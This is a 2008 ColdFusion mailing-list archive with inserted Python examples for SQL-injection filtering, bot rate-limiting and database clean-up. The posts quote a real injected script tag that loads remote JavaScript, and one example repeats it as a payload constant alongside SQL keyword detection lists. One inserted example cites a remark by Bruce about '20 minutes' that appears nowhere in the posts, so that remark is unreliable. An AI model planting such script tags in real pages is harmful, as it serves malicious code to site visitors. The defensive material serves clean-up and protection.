I have been working on a web application to sell as a product. Is there some way that I can protect the app by making the cfm or cfc files into some kind of binary format?

thanks,
tom

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310369
RE: Productizing a Coldfusion web app, question
    <cfexecute name="C:\CFusionMX\bin\CFCompile.bat" arguments="-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\"></cfexecute>

Obviously make sure you have the right directories.

-Original Message-
From: Tom Jones [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 10:26 AM
To: CF-Talk
Subject: Productizing a Coldfusion web app, question

Hello,

I have been working on a web application to sell as a product. Is there some way that I can protect the app by making the cfm or cfc files into some kind of binary format?

thanks,
tom

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310370
Re: help!! = ColdFusion.Window.create Refresh
On Thu, Aug 7, 2008 at 2:20 AM, Rakshith N [EMAIL PROTECTED] wrote:
> Torsten, This was an issue and has been fixed in 8.0.1. I did a quick check on it and it works fine for me. Are you on 8.0.1?
> Charlie, Make sure that you use the right case when you use refreshOnShow in JavaScript as JS is case sensitive. Can you share the code that does not seem to work?

Hi Rakshith:

Thanks for the response. Here's the code I tried:

    <script type="text/javascript">
    function createJournalWindow(transactionID, address) {
        <cfoutput>
        ColdFusion.Window.create('Journal', 'Journal - ' + address,
            '#myself##viewstate.getvalue('xe.journal')#transactionID=' + transactionID,
            {height:456, width:416, modal:true, closable:true, draggable:true,
             resizable:true, center:true, refreshOnShow:true})
        </cfoutput>
    }
    </script>

being called from the following line that's inside a query-driven cfoutput:

    <a href="##" onclick="createJournalWindow(transactionID='#transactionID#', address='#streetAddress1#'); return false;">

This brings up the same window each time (which is whatever window the user first happened to create). If I change that first argument in the create() method from 'Journal' to transactionID (effectively using the transactionID argument that's passed into the function), it works (bringing up a new window each time). The refreshOnShow in the configs doesn't seem to have any effect. I also tried changing to refreshonshow, which seemed to work in that I saw the "Loading" with the ajax image each time... but in spite of that it still brought up the same content and same title in the window.

I'm relatively new to the AJAX-y stuff in CF, so if I'm misunderstanding how the windows are supposed to work, I apologize in advance :)

(running on CF 8,0,1,195765)

Thanks,
Charlie

--
A byte walks into a bar and orders a pint. Bartender asks him "What's wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought you looked a bit off."

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310371
Charts showing developer edition watermark
So the coldfusion charts on this web site are showing up with the developer edition watermark: http://giving.duke.edu/artsandsciences/

Even though it's a licensed install.. Other instances on the server are NOT doing that. Anyone seen this behavior before?

--
Rick Root
New Brian Vander Ark Album, songs in the music player and cool behind the scenes video at www.myspace.com/brianvanderark

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310372
Re: Productizing a Coldfusion web app, question
Oh, this is cool! Thanks,
tom

On Aug 7, 2008, at 8:33 AM, Paul Giesenhagen wrote:
>     <cfexecute name="C:\CFusionMX\bin\CFCompile.bat" arguments="-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\"></cfexecute>
>
> Obviously make sure you have the right directories.
>
> -Original Message-
> From: Tom Jones [mailto:[EMAIL PROTECTED]
> Sent: Thursday, August 07, 2008 10:26 AM
> To: CF-Talk
> Subject: Productizing a Coldfusion web app, question
>
> Hello,
>
> I have been working on a web application to sell as a product. Is there some way that I can protect the app by making the cfm or cfc files into some kind of binary format?
>
> thanks,
> tom

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310373
Re: HELP! SQL Injection Attack!
> Your system appears to be infect with a bot and it is currently banned from access this site...

The cherry on the sundae ;-)

In this page, I even have a form so the user can give his address and claim his innocence ;-)

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310374
Re: Productizing a Coldfusion web app, question
Paul Giesenhagen wrote:
>     <cfexecute name="C:\CFusionMX\bin\CFCompile.bat" arguments="-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\"></cfexecute>
>
> Obviously make sure you have the right directories.

Of course you could just run this from the command line yourself, unless you really want to do it by running a CFML template.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310375
Re: XMLSearch not thread safe
Yes, the tests I'll be doing tomorrow will be with jmeter. I'll post the results when we have them.

On Thu, Aug 7, 2008 at 4:24 PM, Tom Chiverton [EMAIL PROTECTED] wrote:
On Wednesday 06 Aug 2008, Brad Wood wrote: iframes aren't good for load testing. Browsers like IE follow spec and only allow 2 concurrent connections to a server at once.
Even IE lets you adjust this number in the registry, but I use Apache JMeter tbh.
-- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310376
RE: HELP! SQL Injection Attack!
I'm a little bemused as to why you'd create such a response guys. A bot is attempting the injection attacks, yes? It's not likely to be visible to the host computer's owner as far as I can imagine. I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it?

Craig.

-Original Message-
From: Claude Schneegans [mailto:[EMAIL PROTECTED]
Sent: 07 August 2008 16:42
To: CF-Talk
Subject: Re: HELP! SQL Injection Attack!
[...]

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310377
RE: HELP! SQL Injection Attack!
I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server).

You'd need a web application firewall for this. Any ISAPI solution runs in-process with the web server.

Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310378
Re: Newb AJAX question
On Thursday 07 Aug 2008, Bret McDermitt wrote: Thanks Tom, my JS is really weak... can you point me to some resources online that would walk me through this?

Probably not, sorry, I don't really use JavaScript for this sort of thing anymore, and don't know the details of your server or AJAX library.

--
Tom Chiverton

This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310379
Re: HELP! SQL Injection Attack!
Craig Dudley wrote: I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it? Craig.

Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310380
Re: Charts showing developer edition watermark
Never mind, I restarted the instance and it's all good now. Weird.

On Thu, Aug 7, 2008 at 11:40 AM, Rick Root [EMAIL PROTECTED] wrote:
So the coldfusion charts on this web site are showing up with the developer edition watermark http://giving.duke.edu/artsandsciences/ Even though it's a licensed install.. Other instances on the server are NOT doing that. Anyone seen this behavior before?

--
Rick Root
New Brian Vander Ark Album, songs in the music player and cool behind the scenes video at www.myspace.com/brianvanderark

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310381
RE: Productizing a Coldfusion web app, question
You're right ... we are actually running multiple commands in this one cfm file so that is our reasoning .. but the command line is yet another way.

-Original Message-
From: Ian Skinner [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 10:49 AM
To: CF-Talk
Subject: Re: Productizing a Coldfusion web app, question
[...]

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310382
Re: HELP! SQL Injection Attack!
Craig Dudley wrote: I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it? Craig.

Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon. The idea being that since the users may not be aware of their infection, as you mentioned, this just might be the way they find out.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310383
Re: HELP! SQL Injection Attack!
I'm a little bemused as to why you'd create such a response guys.

Just to make sure I give a chance to a legitimate user, in case my robot detection was a bit too strong. For instance, I also have a test based on the number of HTTP requests per second in order to discriminate robots from humans. Sometimes, the limit is not easy to set precisely: there are fast humans, and slow robots ;-)

--
___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310384
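The requests-per-second robot test Claude describes above, modelled as a sliding-window counter per client address. This is an added example and not Claude's code or anything from the list; the window length, the threshold and the request log it replays are constructed for the example. The third client in the log is the "slow robot" from his remark: it never crosses the bar, which is exactly the trade-off he is pointing at.

```python
from collections import defaultdict, deque

# Added example, not code from Claude Schneegans or the CF-Talk list. It
# models his "requests per second" robot test as a sliding-window counter
# per client address; the window, the threshold and the request log below
# are constructed for this example.


class RateGate:
    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.history = defaultdict(deque)   # address -> recent request times
        self.flagged = set()                # addresses currently treated as robots

    def observe(self, address, now):
        """Record one request at time `now` (seconds) and report whether
        the address is flagged. More than max_requests inside the
        trailing window flips it to flagged."""
        recent = self.history[address]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()                # forget requests outside the window
        if len(recent) > self.max_requests:
            self.flagged.add(address)
        return address in self.flagged

    def clear(self, address):
        """The 'claim your innocence' form from the post: lift the flag
        and start the address's count afresh."""
        self.flagged.discard(address)
        self.history.pop(address, None)


# Constructed request log: (seconds since start, client address).
REQUESTS = [
    (0.00, "192.0.2.10"), (0.40, "192.0.2.10"), (1.10, "192.0.2.10"),        # human clicking around
    (0.00, "198.51.100.7"), (0.05, "198.51.100.7"), (0.10, "198.51.100.7"),
    (0.15, "198.51.100.7"), (0.20, "198.51.100.7"), (0.25, "198.51.100.7"),  # burst from a robot
    (5.00, "203.0.113.9"), (15.00, "203.0.113.9"), (25.00, "203.0.113.9"),   # slow robot, below the bar
]


def classify(requests, max_requests=4, window_seconds=1.0):
    """Replay a log through the gate and return the flagged addresses."""
    gate = RateGate(max_requests, window_seconds)
    for when, address in sorted(requests):
        gate.observe(address, when)
    return sorted(gate.flagged)


if __name__ == "__main__":
    print(classify(REQUESTS))   # only the bursting address is flagged
```

Lowering `max_requests` catches slower robots but starts catching quick humans too; there is no threshold that separates the two by rate alone, which is why the post pairs the check with a way for a wrongly flagged visitor to get unbanned.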
Re: HELP! SQL Injection Attack!
We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). Its intrusion prevention settings are highly configurable, both globally and individually, and with an annual subscription of 200 dollars we get I believe daily upgrades to help configure against new and known issues. In our small shop it's been worth every single penny.

HTH
Mark

Kris Jones wrote: I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? [...] Cheers, Kris

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310385
CFwindow and jquery in source
Hi, I have an edit record form with some jquery that exists on its own and runs fine. I'd also like to call this cfm as a cfwindow source under certain circumstances (parent-child associations). I cannot for the life of me figure out how to get my jquery to run when it is running inside a cfwindow. Any help? Does anyone have any examples of this? I've changed my actual functions inside the $(function(){}) to myFun = function(){}, but I'm thinking that the $(function(){}) line is the issue. Thanks!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310386
RE: HELP! SQL Injection Attack!
The attack appends JavaScript to character fields.

Hi. Just checking in here on SQL injection -- I am a self-taught, self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection.

So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code:

<script src=http://jjmaoduo.3322.org/csrss/w.js></script>

and a few more things in html I didn't include.

What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm:

<CFIF IsDefined("groupid")><CFPARAM NAME="groupid" TYPE="integer"></CFIF>
<CFIF IsDefined("login")><CFPARAM NAME="login" TYPE="integer"></CFIF>
<CFIF IsDefined("sg")><CFPARAM NAME="sg" TYPE="integer"></CFIF>
<CFIF IsDefined("messageid")><CFPARAM NAME="messageid" TYPE="integer"></CFIF>
<CFIF IsDefined("msg")><CFPARAM NAME="msg" TYPE="integer"></CFIF>

So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses. Can this be done through a URL?

Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field.

If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this?

Anyway, got my hands full. Any thoughts on this would be great.

And yes, I'd like to see the URL loop script that was offered by Justin Scott:

Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy.

Bruce Schuman
Santa Barbara CA
http://originresearch.com

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310387
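The two stopgaps in Bruce's post (the CFPARAM TYPE="integer" list, and Justin Scott's application.cfm filter that aborts a request when a URL variable carries both a semicolon and a SQL keyword) modelled in Python, followed by the parameterized query that the thread keeps pointing to as the real fix. This is an added example, not code from either poster or from the list; the keyword list, the demo table and the request strings are assumptions made for it, and the parameter names are the ones Bruce listed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Added example, not code from the CF-Talk thread. It models two checks the
# posts describe: Justin Scott's application.cfm filter (reject the request
# when a URL parameter holds both a semicolon and a SQL keyword) and Bruce
# Schuman's CFPARAM TYPE="integer" rule, then shows the parameterized query
# that removes the injection vector itself. The keyword list, the demo table
# and the sample requests are assumptions made for this example.

SQL_KEYWORDS = ("select", "insert", "update", "delete", "declare", "exec",
                "cast", "drop", "union", "cursor", "sysobjects", "syscolumns")
INTEGER_PARAMS = {"groupid", "login", "sg", "messageid", "msg"}  # names from Bruce's post


def parse_query(query_string):
    """Split a raw query string on '&' only, so a ';' inside a value stays
    visible to the filter, and URL-decode names and values (an encoded
    %3B has to be decoded before the semicolon test or it slips through)."""
    params = {}
    for pair in query_string.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def suspicious_params(query_string):
    """Names of URL parameters that contain both a semicolon and a SQL
    keyword (the thread's heuristic). An empty list means no hit."""
    hits = []
    for name, value in parse_query(query_string).items():
        lowered = value.lower()
        if ";" in lowered and any(re.search(r"\b%s\b" % kw, lowered)
                                  for kw in SQL_KEYWORDS):
            hits.append(name)
    return hits


def coerce_integer_params(params):
    """The CFPARAM TYPE="integer" idea: a parameter the application treats
    as an integer must parse as one, otherwise the request is rejected
    (ValueError). Returns a copy with the integer values converted."""
    checked = {}
    for name, value in params.items():
        if name in INTEGER_PARAMS:
            if not re.fullmatch(r"-?\d+", value.strip()):
                raise ValueError("parameter %r must be an integer" % name)
            checked[name] = int(value)
        else:
            checked[name] = value
    return checked


def make_messages_db():
    """Constructed in-memory table standing in for the list's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, subject TEXT)")
    conn.execute("INSERT INTO messages VALUES (1, 'HELP! SQL Injection Attack!')")
    conn.commit()
    return conn


def lookup_message(conn, messageid):
    """Parameterized query (the cfqueryparam equivalent): the driver binds
    the value, so it is never parsed as SQL. Returns the subject or None."""
    row = conn.execute("SELECT subject FROM messages WHERE id = ?",
                       (messageid,)).fetchone()
    return row[0] if row else None


def handle_request(query_string, conn):
    """The request gate in the order the thread suggests: abort on a filter
    hit, reject badly typed integers, otherwise run the safe query.
    Returns ("aborted", hits), ("rejected", reason) or ("ok", result)."""
    hits = suspicious_params(query_string)
    if hits:
        # Justin's filter cfaborts here and e-mails the details; returning
        # the finding lets the caller log or alert on it instead.
        return ("aborted", hits)
    try:
        checked = coerce_integer_params(parse_query(query_string))
    except ValueError as exc:
        return ("rejected", str(exc))
    return ("ok", lookup_message(conn, checked.get("messageid")))


if __name__ == "__main__":
    db = make_messages_db()
    for qs in ("messageid=1", "messageid=1;drop table users", "messageid=abc"):
        print(qs, "->", handle_request(qs, db))
```

The filter needs both the semicolon and a keyword before it fires, which is what keeps an ordinary search term such as "select" from tripping it; as Justin notes it only looks at the URL scope, so form posts are not covered, and the parameter binding in `lookup_message` is what actually closes the hole whatever the input looks like.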
Re: Installation of CF 8 (developer edition) is not working
On Thursday 07 Aug 2008, Torrent Girl wrote: I just reinstalled this morning and I DID encounter error

What one!

--
Tom Chiverton

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310388
RE: CFwindow and jquery in source
When you call the cfwindow, have you tried initializing the ready function?

-Original Message-
From: Justin T [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 11:17 AM
To: CF-Talk
Subject: CFwindow and jquery in source
[...]

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310389
Re: HELP! SQL Injection Attack!
We've got the same thing. Sonicwall checks everything coming in and out of the network and checks for anything that matches a database of known injection types. Helps a ton!

Matt

Mark wrote: We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). [...]

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310390
RE: HELP! SQL Injection Attack!
Bruce... Without going into the whole thing, the script runs in your database and selects against the systables and syscolumns tables. It then loops over these and performs updates on existing records.

You really need to go back and read the entire thread from 3 weeks ago. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065 It has everything you'd need to know about what this attack does, how to reverse the results, and lastly how to prevent it from happening again.

andy

-Original Message-
From: Bruce Schuman [mailto:[EMAIL PROTECTED]
Sent: Thursday, August 07, 2008 11:17 AM
To: CF-Talk
Subject: RE: HELP! SQL Injection Attack!
[...]

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310391
Re: Installation of CF 8 (developer edition) is not working
What one!
--
Tom Chiverton

It didn't say. It just said check the log. I did but see no error. Maybe I have a bad version of CF? I have never had a problem running CF locally. Could this possibly be the permissions on my machine?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310392
Re: HELP! SQL Injection Attack!
Bruce Schuman wrote: How do they do this?

Yes it is done through the URL. This is well discussed here and in many blogs. But the gist is that the errant URL parameter is an ENTIRE SQL function that will tell your database to scan every table looking at every field, and if the field is a character field, to append the payload to that field.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310393
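Andy's and Ian's answers to Bruce are the same point: the payload does not know his column names, it reads them from the catalog (systables/syscolumns) and updates every character column it finds. The clean-up Bruce wrote by hand has to walk the same catalog, and that is what this added example does. It is not code from the thread; it uses sqlite's sqlite_master and PRAGMA table_info in place of the SQL Server catalog, and the tables, rows and the payload layout are constructed from the value quoted earlier in the thread.

```python
import re
import sqlite3

# Added example, not code from the CF-Talk thread. The attack Andy and Ian
# describe drives its UPDATE loop from the database catalog; the clean-up
# has to walk the same catalog in reverse. This version uses sqlite's
# sqlite_master / PRAGMA table_info in place of SQL Server's systables and
# syscolumns, and the tables, rows and payload layout are constructed from
# the value quoted earlier in the thread.

# What the injected value looked like in the thread: a </title> to break out
# of the page title, the script tag, and an opening comment to swallow the
# rest of the page.
PAYLOAD = '</title><script src=http://jjmaoduo.3322.org/csrss/w.js></script><!--'

# One pattern that removes any such run, whatever host the script points at.
INJECTED = re.compile(r"(?:</title>)?<script\b[^>]*>.*?</script>(?:<!--)?",
                      re.IGNORECASE | re.DOTALL)


def text_columns(conn):
    """Yield (table, column) for every character-typed column, read from
    the catalog so no table or column name has to be known in advance."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(t in (ctype or "").upper() for t in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def scan(conn):
    """Count affected rows per column: {(table, column): rows}."""
    report = {}
    for table, col in text_columns(conn):
        # Names come from the catalog, not from a request, and are quoted;
        # the search value itself is still bound as a parameter.
        n = conn.execute(f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?',
                         ("%<script%",)).fetchone()[0]
        if n:
            report[(table, col)] = n
    return report


def clean(conn):
    """Strip the injected run from every affected row; returns rows fixed per column."""
    fixed = {}
    for table, col in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                            ("%<script%",)).fetchall()
        count = 0
        for rowid, value in rows:
            cleaned = INJECTED.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                             (cleaned, rowid))
                count += 1
        if count:
            fixed[(table, col)] = count
    conn.commit()
    return fixed


def make_infected_db():
    """Constructed sample of what the thread describes: every row of a few
    character columns carries the payload, numeric columns are untouched."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name VARCHAR(50), "
                 "homepage TEXT, age INTEGER)")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, filename TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice" + PAYLOAD, "http://example.com/" + PAYLOAD, 30),
        (2, "bob" + PAYLOAD, "http://example.org/", 41),
    ])
    conn.execute("INSERT INTO photos VALUES (1, ?)", ("Gisella427.jpg" + PAYLOAD,))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_infected_db()
    print("before:", scan(db))
    print("fixed: ", clean(db))
    print("after: ", scan(db))
```

Run `scan` first and keep its report: it tells you which columns were reachable by the injected statement, which is also the list of columns a second wave will hit if the application is not fixed, and the `clean` pass is only worth doing once the request path is closed (cfqueryparam, per the rest of the thread), or the 20 minutes Bruce mentions will bring it straight back.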
Re: Installation of CF 8 (developer edition) is not working
Brad you asked... What output to the screen do you get when you try starting the service from the command line?

C:\> net start "ColdFusion 8 Application Server"

I tried this again and now I am getting an error:

A service specific error occured 2...
EXPLANATION A service specific error occured
ACTION Refer to the help documentation of that service to determine the problem

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310394
Re: Installation of CF 8 (developer edition) is not working
Ok I think I may have gotten somewhere with this. I went into SERVICES to check to see if CF was running and it wasn't. I selected RESTART and got the following message:

Windows could not start the CF 8 application server on local computer. For more information review the system event log

When I check the log, here is what I see:

The ColdFusion 8 Application Server service could not be started. Check the server coldfusion log files for more information

Any suggestions?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310395
RE: Installation of CF 8 (developer edition) is not working
Tgirl, When you tried re-install, did you first 'uninstall' CF, and then remove all existing CF directories so that you were doing a 'fresh' install?

Dave

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310396
Re: Installation of CF 8 (developer edition) is not working
Here is something that came from one of the CF logs:

08/06 14:09:15 error There is no web application configured to service your request
coldfusion could not be started because it is already running.
coldfusion could not be started because it is already running.
java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified)
    at java.util.zip.ZipFile.open(Native Method)
    at java.util.zip.ZipFile.<init>(ZipFile.java:114)
    at java.util.jar.JarFile.<init>(JarFile.java:133)
    at java.util.jar.JarFile.<init>(JarFile.java:70)
Exception in thread main
java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified)
    at java.util.zip.ZipFile.open(Native Method)
    at java.util.zip.ZipFile.<init>(ZipFile.java:114)
    at java.util.jar.JarFile.<init>(JarFile.java:133)
    at java.util.jar.JarFile.<init>(JarFile.java:70)
Exception in thread main
java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified)
    at java.util.zip.ZipFile.open(Native Method)
    at java.util.zip.ZipFile.<init>(ZipFile.java:114)
    at java.util.jar.JarFile.<init>(JarFile.java:133)
    at java.util.jar.JarFile.<init>(JarFile.java:70)
Exception in thread main

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310397
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: What one! -- Tom Chiverton
It didn't say. It just said check the log. I did but see no error. Maybe I have a bad version of CF? I have never had a problem running CF locally.

That might be possible? Is this a downloaded installer? If so did you confirm with the Adobe published download byte size and MD5 hash key that you received a complete and successful download? This is a large and complex enough software that you can get a partial download that will not completely fail but will not succeed either.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310398
Re: Installation of CF 8 (developer edition) is not working
Tgirl, When you tried re-install, did you first 'uninstall' CF, and then remove all existing CF directories so that you were doing a 'fresh' install?

* I uninstalled but didn't make sure all of the directories were removed. Should I try again?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310399
RE: Installation of CF 8 (developer edition) is not working
* I uninstalled but didn't make sure all of the directories were removed. Should I try again?

I would. Based on your last post, your jrun.jar file isn't even there, so you obviously don't have a full installation. I would check the downloaded file size as Ian pointed out. Then, if you can confirm you have a good download, go ahead and uninstall. Then remove all the coldfusion directories. I don't know if it's just c:\ColdFusion8 or not, maybe someone more familiar with 8 could pipe up on that one. There might be some registry entries to remove as well.

Sincerely,
Dave Phillips

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310400
Re: Installation of CF 8 (developer edition) is not working
yes, Ian as a matter of fact I remembered seeing an error message when I downloaded it that it was incomplete. I completely forgot about that. I assumed this was something I could ignore. I downloaded it from the adobe site. Is there a better source to download from?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310401
RE: Installation of CF 8 (developer edition) is not working
Is there a better source to download from?

No. Delete the download you have (permanently) and then download it again. Maybe even to a different location to be safe. Then check the size/md5 hash to be sure you have a good download. Dave

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310402
coldfusion 8: cfsearch type=internet want exact match on cf_custom1
When I index documents I put some metadata in the custom1 field. When I search I use an internet type search and use cf_custom1 to help filter results. An example of the criteria that I set in cfsearch: cf_custom1:"Finland" currency meaning to only return results with an exact match to Finland in custom1 and content that contains the word currency or derivations. OK, now the problem. According to the documentation since I put Finland in double quotes it should not STEM and only return exact matches. It isn't. I get back results from verity with Finland_2002 in custom1. Anybody have any idea what I am doing wrong?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310403
RE: HELP! SQL Injection Attack!
Any recommendations for web app firewall? I have worked with Netscreen network firewall for years.

-Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:01 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack!

I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server).

You'd need a web application firewall for this. Any ISAPI solution runs in-process with the web server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310404
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: yes, Ian as a matter of fact I remembered seeing an error message when I downloaded it that it was incomplete. I completely forgot about that. I assumed this was something I could ignore. I downloaded it from the adobe site. Is there a better source to download from?

No there is not a better choice, it is just that it is such a large download that if there is any network hiccup during the process you may not always get a complete download. That is why Adobe provides the file size and MD5 numbers so you can confirm you have a complete download before moving forward to avoid the pain you have been suffering.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310405
Re: CFwindow and jquery in source
No, I sure haven't. I'm actually not sure what you mean. When you call the cfwindow, have you tried initializing the ready function?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310406
Re: Installation of CF 8 (developer edition) is not working
No there is not a better choice, it is just that it is such a large download that if there is any network hiccup during the process you may not always get a complete download. That is why Adobe provides the file size and MD5 numbers so you can confirm you have a complete download before moving forward to avoid the pain you have been suffering.

Ok I am starting from scratch :) I'll go to lunch and not work on anything else to prevent hiccups (hopefully)

